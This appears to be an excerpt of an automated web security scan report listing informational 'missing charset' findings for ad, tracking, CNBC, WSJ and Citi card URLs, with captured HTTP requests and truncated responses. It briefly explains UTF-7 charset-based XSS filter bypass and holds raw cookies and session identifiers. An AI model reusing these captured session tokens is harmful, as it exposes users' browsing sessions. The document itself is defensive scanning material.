http://www.inlandbusinesslaw.com/attorneyprofiles.html
http://www.inlandbusinesslaw.com/contactus.html
http://www.inlandbusinesslaw.com/mentoringprogram.html
http://www.nutter.com/attorneys.php

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

23.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://480-adver-view.c3metrics.com
Path:	/c3VTabstrct-6-2.php

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225195243&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fburp%2Fshow%2F3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; 480-VT=adver_05-21-2011-12-34-28_14859001441305981268; SERVERID=s3

Response

23.2. http://480-adver-view.c3metrics.com/v.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://480-adver-view.c3metrics.com
Path:	/v.js

Request

GET /v.js?id=adver&cid=480&t=72 HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225880353&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=451931075376; SERVERID=s3; 480-SM=adver_06-16-2011-11-53-17; 480-VT=adver_06-16-2011-11-53-17_12223990061308225197; 480-nUID=adver_12223990061308225197

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 12:51:31 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Content-Length: 1008
Connection: close
Content-Type: text/html

if(!window.c3VTconstVal){c3VTconstVals={c3VJSconst:{c3VJSscriptLimit:0,c3VJScollection:new Array(),c3VJSurl:'v.js',c3VTJSurl:'c3VTabstrct-6-2.php'}};window.c3VTconstVal=c3VTconstVals}if(!window.fireC3
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/p.media/a0mNJHpdZao56Zb14cbeTGJaWcJkSAMyWdJUUUn15bEtUEMqVEJ9PavIScZbJRrixPWvcWVbV2UenmtaOXayM2WYCQGFB26JFpWXpVWbb0bnkYU761qqnRF3ZbUrJYWdJ3nbjpQFBNYaUr5T7k4TvRoEZbDYFbaWtFTm6rBpFMBlsZb2kS/2020316/frame.html

Request

GET /p.media/a0mNJHpdZao56Zb14cbeTGJaWcJkSAMyWdJUUUn15bEtUEMqVEJ9PavIScZbJRrixPWvcWVbV2UenmtaOXayM2WYCQGFB26JFpWXpVWbb0bnkYU761qqnRF3ZbUrJYWdJ3nbjpQFBNYaUr5T7k4TvRoEZbDYFbaWtFTm6rBpFMBlsZb2kS/2020316/frame.html HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308233327911&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=a1nAGsMwTPfKbarmnZbakcwbNPYql16iWIf2wYkSRUxLTOdZatDqv7F6niX3NnnvrTdHym4fZa7Ab9H0B1g7qYZc16CNU91nTQUiUYNxYdcXp7dcsi7Zc6oGHbX1C9LyAJaZae7tFCw0IAjEPKI16y49LjZdKbd7jKyElKQmAXSZadsnDr2lZck7yZd37ZcdXJeiXPyJwRGIY725O76qq3WHZavXyZcgkmlKZdDMquDCV5ZbZbDZdmZcMq2c53YOxk166Cj77ZaKZbPrknxNfWf7aZcLnwnnHGjj8I19CvrlW4H6D01O1E4s3AZaiKkJmqrlZaV41YJbC97vkYxZbKhuuXUcbZdKRuloTELqZbBCFiiCUoJ1fpc8xI0L6pn6byrmec2feZaOTS9p0MCSqorZdaM8lg8vwcTQqZdVM67k02TjmucgEtWZawZcdEHdNZdQ1HQpxi8Qxy2u3iaZbJLWENr2c3RVux7n54yZasVQ5OoxgqDwl4c0GbwB3nmxsF7mebgH1JKQj2ElRclm1auFOGWJCDdmx0kufWb7h9K1rP7Iifps15

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 102
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 202
Expires: 0
Connection: keep-alive

<script type="text/javascript" language="JavaScript">
var img = new Image();
img.src = "http://secure-us.imrworldwide.com/cgi-bin/m?ci=us-tribalfusion&cg=97007685720&cc=1&rnd=1250463769";
</script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/p.media/aMmOQKodaOYETw3t3HQcrF2AFImWAoVW39XFbb1UBiXTamRrJFUFv5Vt3YobQpQbZbp1qUy5Tfg5Ej0oTbBXbJcTdjTn6UBnVrrmHUJ3TFl5teN5ABFmbbIXcM0YGZb21VvxmEFV2Fn2Vb7HWAU4PqMQSsMsQHbuYHBqVAvp4r3kdkZcL1d/2546166/adTag.html

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/p.media/aXmOQK5t6N4mFZdmb3ZaXcfS1VJYXs7OpTrV3rJWTFfBUmnYPTbYQsrnQtBxYdvmWP3N4GQUXUnZbUP6o2PU7Qm7F3t3p1tMAntIM36MY5cbaVcQjWcF7SAFNUHQ3UUr02r2oVaQnWEMlQqQZaSVbIPF6vPWQdWcUR2rXtmHeO0tqIdkZcnjF/2546166/wrapper1.html

Request

GET /p.media/aXmOQK5t6N4mFZdmb3ZaXcfS1VJYXs7OpTrV3rJWTFfBUmnYPTbYQsrnQtBxYdvmWP3N4GQUXUnZbUP6o2PU7Qm7F3t3p1tMAntIM36MY5cbaVcQjWcF7SAFNUHQ3UUr02r2oVaQnWEMlQqQZaSVbIPF6vPWQdWcUR2rXtmHeO0tqIdkZcnjF/2546166/wrapper1.html HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308233327911&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=a1nAGsMwTPfKbarmnZbakcwbNPYql16iWIf2wYkSRUxLTOdZatDqv7F6niX3NnnvrTdHym4fZa7Ab9H0B1g7qYZc16CNU91nTQUiUYNxYdcXp7dcsi7Zc6oGHbX1C9LyAJaZae7tFCw0IAjEPKI16y49LjZdKbd7jKyElKQmAXSZadsnDr2lZck7yZd37ZcdXJeiXPyJwRGIY725O76qq3WHZavXyZcgkmlKZdDMquDCV5ZbZbDZdmZcMq2c53YOxk166Cj77ZaKZbPrknxNfWf7aZcLnwnnHGjj8I19CvrlW4H6D01O1E4s3AZaiKkJmqrlZaV41YJbC97vkYxZbKhuuXUcbZdKRuloTELqZbBCFiiCUoJ1fpc8xI0L6pn6byrmec2feZaOTS9p0MCSqorZdaM8lg8vwcTQqZdVM67k02TjmucgEtWZawZcdEHdNZdQ1HQpxi8Qxy2u3iaZbJLWENr2c3RVux7n54yZasVQ5OoxgqDwl4c0GbwB3nmxsF7mebgH1JKQj2ElRclm1auFOGWJCDdmx0kufWb7h9K1rP7Iifps15

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 102
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 400
Expires: 0
Connection: keep-alive

<IFRAME src="http://a.tribalfusion.com/p.media/aymOQKoAvBms3ppWQB3aZbe5Hyn3m7IprfZaXcbQ1c3YXsfynEvV3FMPVFbAUP72Qq32SV3MQtfx0WrmT6Mw3c30Yr3ZdUPPw4AYdR6BK2HFnXWYAndan4mBU5VvgTGBdVsMeSAvwTtn3UUjY3beoWErv
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/p.media/aYmNJH2mYHpWAqVdJ6XFfd1bjf1qypPbFFUrZbXTtQXoFBsPFroXqMn5aJl2arPoEbCYrU6WWrRmPvBnVrqotUE3EMi2dmy4mvJprQK0Gn0YcMU1VvMnqj43rZbVWUnEVP32QTQQQG3qQt7O1H7uTmUu2GnX0brZdTPmw2SQS8JJC6j/2522456/frame.html

Request

GET /p.media/aYmNJH2mYHpWAqVdJ6XFfd1bjf1qypPbFFUrZbXTtQXoFBsPFroXqMn5aJl2arPoEbCYrU6WWrRmPvBnVrqotUE3EMi2dmy4mvJprQK0Gn0YcMU1VvMnqj43rZbVWUnEVP32QTQQQG3qQt7O1H7uTmUu2GnX0brZdTPmw2SQS8JJC6j/2522456/frame.html HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308233327911&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=a1nAGsMwTPfKbarmnZbakcwbNPYql16iWIf2wYkSRUxLTOdZatDqv7F6niX3NnnvrTdHym4fZa7Ab9H0B1g7qYZc16CNU91nTQUiUYNxYdcXp7dcsi7Zc6oGHbX1C9LyAJaZae7tFCw0IAjEPKI16y49LjZdKbd7jKyElKQmAXSZadsnDr2lZck7yZd37ZcdXJeiXPyJwRGIY725O76qq3WHZavXyZcgkmlKZdDMquDCV5ZbZbDZdmZcMq2c53YOxk166Cj77ZaKZbPrknxNfWf7aZcLnwnnHGjj8I19CvrlW4H6D01O1E4s3AZaiKkJmqrlZaV41YJbC97vkYxZbKhuuXUcbZdKRuloTELqZbBCFiiCUoJ1fpc8xI0L6pn6byrmec2feZaOTS9p0MCSqorZdaM8lg8vwcTQqZdVM67k02TjmucgEtWZawZcdEHdNZdQ1HQpxi8Qxy2u3iaZbJLWENr2c3RVux7n54yZasVQ5OoxgqDwl4c0GbwB3nmxsF7mebgH1JKQj2ElRclm1auFOGWJCDdmx0kufWb7h9K1rP7Iifps15

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 102
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 245
Expires: 0
Connection: keep-alive

<script type="text/javascript" language="JavaScript">
TFPix1250463765 = new Image();
TFPix1250463765.src = "http://su.addthis.com/red/usync?pid=11111&url=http%3A%2F%2Fa.tribalfusion.com%2Fi.match%3F
...[SNIP]...

23.7. http://ad.doubleclick.net/adi/N3867.270604.B3/B5387288.7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3867.270604.B3/B5387288.7

Request

Response

23.8. http://ad.doubleclick.net/adi/N553.specificmedia.com/B4970757.3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.specificmedia.com/B4970757.3

Request

Response

23.9. http://ad.doubleclick.net/adi/N553.specificmedia.com/B4970757.4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N553.specificmedia.com/B4970757.4

Request

Response

23.10. http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.RealMedia/B5598690.4

Request

GET /adi/N5823.RealMedia/B5598690.4;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/1199171978/Top1/USNetwork/BCN2011050712_001_HP/HP_728x90.html/726348573830336e374e674144526a62?;ord=1199171978? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73e.js&size_id=2&account_id=6451&site_id=11953&size=728x90
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

23.11. http://ad.doubleclick.net/adi/N5823.RealMedia/B5598690.8 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N5823.RealMedia/B5598690.8

Request

GET /adi/N5823.RealMedia/B5598690.8;sz=728x90;click0=http://network.realmedia.com/RealMedia/ads/click_lx.ads/trpnbcucnbc/ros/728x90/jx/ss/a/L30/473239540/Top1/USNetwork/BCN2011050712_002_HP/HP_ron_728x90.html/726348573830336e374e674144526a62?;ord=473239540? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73e.js&size_id=2&account_id=6451&site_id=11953&size=728x90
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

23.12. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/brokerbuttons.wsj.com/us_subscriber

Request

Response

23.13. http://ad.doubleclick.net/adi/interactive.wsj.com/forgotpassword previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/interactive.wsj.com/forgotpassword

Request

Response

23.14. http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/interactive.wsj.com/front_nonsub

Request

Response

23.15. http://ad.doubleclick.net/adi/interactive.wsj.com/slideshow previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/interactive.wsj.com/slideshow

Request

Response

23.16. http://ads.bridgetrack.com/track/f/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.bridgetrack.com
Path:	/track/f/

Request

Response

23.17. http://amch.questionmarket.com/adscgen/st.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adscgen/st.php

Request

GET /adscgen/st.php?survey_num=844890&site=65133128&code=39959888&randnum=8219653 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308250393695&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=40348193-10-1_898849-1-2_41511170-8-1_600001476369-3-6_600001470345-3-2_42093232-5-6_42093309-5-9_600001476380-3-2_600001476381-3-1_600001476393-3-2_600001470352-3-1_600001470355-3-1_600001470354-3-2_600001470351-3-2_600001476392-3-1_908687-7-1_600001476369-7-3_38410992-16-1_600001470355-7-1_600001470346-7-1_40506188-17-1_42061907-3-1_42061906-3-2_42061908-3-4_914175-2-1_41958468-7-1_911895-5-1_911895-6-1_911895-2-1_911895-4-1_911895-3-1_725047-2-2_500005401531-39-1_41197792-8-1_200214929975-4-1; ES=845473-OaS)M-0_899015-nQ5*M-0_908396-`YF*M-ix6_898849-j.h)M-^s$_865756-gf3.M-0_907755-rWF*M-CH>_855789-fKz.M-0_910475-*S>.M-U"2_913745-C8[.M-0_910169-P$[.M-0_910595-5[T/M-U4_724925-tLN:M-08_888315-)WN:M-0_893515-|hN:M-0_889435-86q:M-0

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 18:53:17 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
DL_S: b103.dl
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 165
Content-Type: text/html

(function(){
if(1!=4){
(new Image).src="http://amch.questionmarket.com/adsc/d844890/33/39959888/decide.php?ord="+Math.floor((new Date()).getTime()/1000);

}
})();

23.18. http://api.cnbc.com/api/movers/movers.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.cnbc.com
Path:	/api/movers/movers.asp

Request

GET /api/movers/movers.asp?chartType=gainers&rowCount=5&link=quote HTTP/1.1
Host: api.cnbc.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 16 Jun 2011 11:25:59 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: private
Content-Length: 2475
Expires: Thu, 16 Jun 2011 10:45:59 GMT
X-Powered-By: ASP.NET
IISExport: This web site was exported using IIS Export v4.2
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Market Movers</title>
<link rel="stylesheet" href
...[SNIP]...

23.19. http://b3.mookie1.com/2/247B3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/247B3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x90

Request

GET /2/247B3/Motorola/2011Q2_Atrix/CPC/300/11117403339@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RoyalCaribbean=Media6B3; NSC_o4efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660; id=2814750682866683; session=1308239531|1308239531

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 15:52:15 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 513
Content-Type: text/html

<SCRIPT TYPE="text/javascript" language="JavaScript">
var B3d=new Date();
var B3m=B3d.getTime();
B3d.setTime(B3m+30*24*60*60*1000);
document.cookie="Motorola=247B3;expires="+B3d.toGMTString()+";path=/
...[SNIP]...

23.20. http://b3.mookie1.com/2/B3DM/DLX/1@x71 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/2/B3DM/DLX/1@x71

Request

GET /2/B3DM/DLX/1@x71 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/12107855819@x23?USNetwork/Moto_2011Q2_Atrix_247_CPC_300
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RoyalCaribbean=Media6B3; RMFM=011QXErgU10I1k; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; Motorola=247B3; dlx_20100929=set; other_20110126=set; id=2814750682866683; session=1308239531|1308240466

Response

HTTP/1.1 200 OK
Date: Thu, 16 Jun 2011 16:07:48 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 907
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var ZAP_id=cookie_c
...[SNIP]...

23.21. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Request

Response

23.22. http://cdn.krxd.net/kruxcontent/krux_iframe.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn.krxd.net
Path:	/kruxcontent/krux_iframe.html

Request

GET /kruxcontent/krux_iframe.html?bumpCookie HTTP/1.1
Host: cdn.krxd.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _kuid_=10.253.191.52.1305981477680138; ServedBy=logger006; AWSELB=F71565D91A9FA31F15375726C4E9A41F8610EBF23C1FD4E04F92683249232A1107AD68F5C40615C9FC4E9A0D84564E935BEFA9200F71D924D52F6BC2B87D47D531E128E3A8E67A7D93C8EC68B1662730F381A00B07

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/html
Last-Modified: Fri, 13 May 2011 20:19:28 GMT
Server: Apache
X-Request-Time: D=426 t=1306893248154056
X-Served-By: logger016.krxd.net
Content-Length: 2023
Date: Thu, 16 Jun 2011 13:09:27 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html>
<html>
<body>

<script>
// cookie lib, minified
cookie=function(name,value,options){if(arguments.length>1){options=options||{};if(!(value)){v
...[SNIP]...

23.23. http://cdn5.tribalfusion.com/media/1956006/frame.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn5.tribalfusion.com
Path:	/media/1956006/frame.html

Request

Response

23.24. http://cdn5.tribalfusion.com/media/2516896//frm.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cdn5.tribalfusion.com
Path:	/media/2516896//frm.html

Request

Response

23.25. http://creditcards.citicards.com/usc/_include/SiteCatalyst_2011/s_code_vendor_v53.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://creditcards.citicards.com
Path:	/usc/_include/SiteCatalyst_2011/s_code_vendor_v53.js

Request

GET /usc/_include/SiteCatalyst_2011/s_code_vendor_v53.js HTTP/1.1
Host: creditcards.citicards.com
Proxy-Connection: keep-alive
Referer: http://creditcards.citicards.com/usc/platinum/Visa/external/affiliate/Mar2011/default.htm?BTData=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E9EAC5C2DE3E204E6&BT_TRF=42945&app=UNSOL&sc=4T3VJTP1&m=3CJ5MDQ94VW&langId=EN&siteId=CB&B=M&screenID=3000&uc=AKB&t=t&link=Consumer%5F631524418&ProspectID=E5654139F6B747CBA7F80536311316E9
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CitiBTSES=SID=46B70E139B63491DB97393D7D223EA97

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server:
Date: Fri, 17 Jun 2011 10:40:28 GMT
Connection: close
Content-Length: 40129

/* SiteCatalyst code version: H.22.1.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com */
/************************ ADDITIONAL FEATURES ***********
...[SNIP]...

23.26. http://creditcards.citicards.com/usc/thankyou/Preferred/external/May2011/50GC/js/global.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://creditcards.citicards.com
Path:	/usc/thankyou/Preferred/external/May2011/50GC/js/global.htm

Request

GET /usc/thankyou/Preferred/external/May2011/50GC/js/global.htm HTTP/1.1
Host: creditcards.citicards.com
Proxy-Connection: keep-alive
Referer: http://creditcards.citicards.com/usc/thankyou/Preferred/external/May2011/50GC/default.htm?BTData=C0217737569617459544B4BBFBEB2A9A29E918498FDF6F5EFEAC5C2DE43600F6&BT_TRF=47895&app=UNSOL&siteId=CB&langId=EN&sc=1NMZA5W1&B=C&m=3CJ5MDR0300&uc=AJJ&t=t&naInd=M&link=Consumer%5F631524426&ProspectID=3F41C92F74AE43D4B3334B0467420B9F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
